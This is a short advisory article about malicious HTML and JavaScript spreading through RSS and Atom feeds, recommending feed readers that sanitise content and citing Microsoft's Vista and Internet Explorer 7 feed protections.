Anti-malware applications and spam filters are now widely used by nearly all users. Yet digital garbage may still be pouring into your machines from an unsuspected source: RSS and Atom feeds.
Both feed formats automatically deliver updated news and other types of Web information directly to subscribers' readers and aggregators. But feeds can also be used by hackers to secretly transfer viruses, Trojan horses, worms and various other types of malware. That's because feed suppliers often scoop up content automatically without giving thought to the code's safety. As a result, data — both good and bad — is transferred directly to subscribers' computers.
Malware, such as bad HTML and JavaScript, can enter the feeds of even well-known and respected RSS and Atom content suppliers when material is pulled in from other sources without first being checked.
Furthermore, the supplier itself may be a source for yet other suppliers. Such "re-syndication," which exposes content to perhaps millions of computers within just a few hours, makes RSS and Atom feeds a tempting delivery medium for savvy hackers.
What to Do
Simply banning the use of readers and aggregators isn't a good idea, since the move will deny users access to truly useful content, such as news updates. A better approach is to ensure that an approved reader or aggregator contains tools that can strip away malicious code before it can do any damage.
There exist some products developed by vendors that are aware of the feed security problem and have taken the steps necessary to address the issue. Microsoft, for example, meets these criteria. According to Microsoft, the company's Windows Vista and Internet Explorer 7 products employ a dual-pronged approach to feed security:
- Sanitization: The Windows RSS Platform uses several techniques to strip out dangerous JavaScript — and several other variations of malicious HTML — before storing the feed content.
- Restricted Feed View: In the event the first step misses an intruder, Internet Explorer's feed view uses a Restricted Zone approach to spot problematic feeds so that no dangerous script in a feed will ever run, even if made it through the previous step.
